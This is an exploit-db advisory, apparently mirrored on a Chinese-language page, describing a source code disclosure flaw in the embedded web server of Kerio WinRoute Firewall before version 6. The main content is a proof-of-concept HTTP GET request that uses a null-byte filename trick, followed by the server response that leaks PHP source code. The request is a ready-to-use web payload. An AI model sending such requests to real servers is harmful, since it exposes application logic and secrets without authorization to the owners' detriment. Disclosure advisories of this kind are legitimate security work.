Kerio WinRoute Firewall Web Server < 6 - Source Code Disclosure

  • 作者: Andrey Komarov
    日期: 2012-05-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18857/
  • # Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source
Code Disclosure
# Google Dork:
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://winroute.ru/kerio_winroute_firewall.htm
# Version: prior to 6
# Tested on: Microsoft Windows
# CVE :

Source code disclosure attacks on Kerio Web Server allow a malicious user
to obtain the source code of a server-side application.
This vulnerability grants the attacker deeper knowledge of the Web
application logic.

POC:
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
User-Agent: Group-IB OAiK Fuzzer
Host: hostname

HTTP/1.1 200 OK
Connection: Close
Content-Length: 2410
Content-Type: text/plain
Date: Fri, 27 Apr 2012 13:42:27 GMT
Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT
Server: Kerio WinRoute Firewall Embedded Web Server

<?php
require_once('configNonauth.inc');
require_once(CORE_PATH . 'langHeader.inc');
require_once(LIB_PATH . 'Page.inc');
require_once(LIB_PATH . 'HtmlElements.inc');
require_once(CORE_PATH . 'common.inc');
require_once(CORE_PATH . 'browser.inc');
$afg = '';
$jy = kerio("webiface::PhpNonAuth");
$jy->getAsocUserName(&$afg, &$aba);
.....